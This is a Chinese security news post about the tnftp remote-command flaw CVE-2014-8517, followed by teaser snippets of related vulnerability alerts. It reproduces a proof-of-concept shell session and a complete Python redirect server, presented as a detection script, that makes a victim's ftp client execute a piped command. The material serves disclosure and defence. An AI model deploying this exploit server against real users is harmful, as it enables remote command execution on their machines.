漏洞预警:FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)

10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞,漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。

NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp让WEB服务器远程执行恶意命令,并且此漏洞已被编号为CVE-2014-8517 :

a20$ pwd
    /var/www/cgi-bin

a20$ ls -l
    total 4      -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
    -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a

a20$ cat redirect
    #!/bin/sh      echo 'Status: 302 Found'      echo 'Content-Type: text/html'      echo 'Connection: keep-alive'      echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'      echo

a20$
a20$ ftp http://localhost/cgi-bin/redirect
   Trying ::1:80 ...    ftp: Can't connect to `::1:80': Connection refused
   Trying 127.0.0.1:80 ...    Requesting http://localhost/cgi-bin/redirect
   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
   Requesting http://192.168.2.19/cgi-bin/|uname%20-a
       32      101.46 KiB/s
   32 bytes retrieved in 00:00 (78.51 KiB/s)    NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36    ADT 2014    Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
   BOARD evbarm

a20$

漏洞影响范围及公告

Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系统开发商已经意识到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已经发出了漏洞公告:

漏洞检测脚本(请勿用于非法用途)

#!/usr/bin/env python """
Sample OSX/BSD FTP client exploit. Written because ISO policies were doing
my head in. To exploit, edit the value of the cmd variable, then run the
script. To test:

    ftp http://<myserver>/foo

And you should see the command executed.

All wrongs reversed - @stevelord
""" import BaseHTTPServer import sys import socket import urllib

hostname = socket.getfqdn() # Set this to your IP if you have no FQDN port = 8000 # Set this to the port you want to run this on cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying." cmd = urllib.quote(cmd) redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s): if cmd in s.path: s.send_response(200) s.end_headers() else: s.send_response(302) s.send_header("Location", redir) s.end_headers() if __name__ == "__main__": print "redirecting to,", redir
    server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try: httpd.serve_forever() print "Started serving." except KeyboardInterrupt: pass httpd.server_close() print "\nStopped serving."

解决方案和更详细的内容参见:

http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464

http://seclists.org/oss-sec/2014/q4/460

文章转载自 开源中国社区 [http://www.oschina.net]

时间: 2024-07-31 12:29:47

漏洞预警:FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)的相关文章

漏洞预警:OpenSSH 出现远程执行代码漏洞

SecurityFocus 在其网站上公布了一个关于 OpenSSH 的漏洞,信息如下: OpenSSH CVE-2016-10009 远程执行代码漏洞 Bugtraq ID:94968 Class:Unknown CVE:CVE-2016-10009 Remote:Yes Local:No Published:Dec 19 2016 12:00AM Updated:Dec 20 2016 01:11PM Credit:Jann Horn of Project Zero. 易受攻击的版本: Op

漏洞预警 GNU Bash 本地命令执行漏洞

近期历史悠久的 GNU Bash 爆出了一个高危漏洞,Bash < 4.4 版本存在安全漏洞,通过构造的 SHELLOPTS.PS4 环境变量,本地用户利用此漏洞可用 root 权限执行任意命令. 官方 CVSS V3 评级为 High,属于高危漏洞,预测当前 90% 以上的 Linux 用户都会受到影响. http://www.openwall.com/lists/oss-security/2016/09/26/9 小编测试了一下,100% 命中: 文章转载自 开源中国社区 [http://w

趋势杀毒曝远程执行漏洞 可盗取用户所有密码

塔维斯·奥曼迪(Tavis Ormandy),谷歌信息安全工程师,发现趋势科技杀毒产品中存在漏洞,可致任意网站执行远程代码盗取用户的所有密码.趋势科技表示,已修复该漏洞及另一个远程执行漏洞. 本周一趋势科技针对此漏洞回应,"根据我们的标准漏洞响应流程,与奥曼迪协作,确认并解决了这个漏洞.客户目前可通过自动更新修复此问题." 但奥曼迪公开了他与趋势官方的来往邮件,隐晦地表达出他对该公司行动缓慢的不满. "这意味着网络上的任何人都能完全静默地偷走你的所有密码,还能在无需用户互动的

php5系列的apache远程执行漏洞攻击脚本_C 语言

php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用... 复制代码 代码如下: /* Apache Magica by Kingcope *//* gcc apache-magika.c -o apache-magika -lssl *//* This is a code execution bug in the combination of Apache and PHP.On debian and Ubuntu the vulnerability is presen

漏洞预警!微软曝光震网三代漏洞,隔离网面临重大危机

北京时间6月14日,本月的微软补丁今天发布,经过360安全专家研判确认以下两个漏洞需要引起高度重视,采取紧急处置: LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543). 根据微软最新公告,LNK文件远程代码执行漏洞(CVE-2017-8464)已经发现了在野利用且具有国家背景,黑客可以通过U盘.光盘.网络共享等途径触发漏洞,完全控制用户系统,对基础设施等隔离网极具杀伤力,危害堪比前两代震网攻击. 该漏洞是一个微软Window

Struts2 又现高危漏洞,黑客分分钟可远程执行任意系统命令【紧急预警】

    由于该漏洞影响范围较广(Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10),漏洞危害程度严重,可造成直接获取应用系统所在服务器的控制权限. 这是什么意思? 黑客可以利用该漏洞通过浏览器在远程服务器上执行任意系统命令,将会对受影响站点造成严重影响,引发数据泄露.网页篡改.植入后门.成为肉鸡等安全事件. 为什么说本次漏洞影响极大? 此前 s2-016 漏洞同样危害非常严重,多数站点已经打补丁,而本次漏洞在 s2-016 补丁后的

漏洞预警:WordPress 储存型 XSS 漏洞

2017年10月19日,WordPress 官方发布了一条安全通告表示在4.8.1版本中发现了一个存储型的XSS漏洞,通过该漏洞,攻击者可以在受影响网站的评论区写下包含恶意代码的留言,当该留言页面被打开时,其中的恶意代码会执行,导致该网站的权限,插件等被更改,甚至被完全控制,安全风险为高危. 目前WordPress是全球装机量比较大的CMS系统,建议站长们关注,并尽快开展自查工作,及时更新到最新版WordPress. 漏洞利用条件和方式: 远程利用 PoC状态 目前PoC已经公开 漏洞影响范围:

CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告

一. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险. 二. 漏洞基本信息 漏洞编号:CVE-2017-9805 漏洞名称: Struts2 REST插件远程执行命令漏洞(S2-052) 官方评级: ** 严重 **漏洞描述: 当S

ImageMagick远程代码执行漏洞CVE-2016-8707 绿盟科技发布安全威胁通告

在 ImageMagicks 的转换实用程序中, TIFF 图像压缩处理存在一个写边界的问题.攻击者利用一个精心编制的 TIFF 文件,可以导致的界限写,特别是可以利用的情况下进入远程执行代码.任何用户都可以利用特殊构造的TIFF触发这个漏洞. 针对这个漏洞,绿盟科技发布了安全威胁通告,全文见文末 ImageMagick远程代码执行漏洞CVE-2016-8707 此漏洞目前是与 ImageMagick转换实用程序捆绑在一起,它是一块非常受欢迎的软件.因此许多使用这个程序进行图像格式转换的 web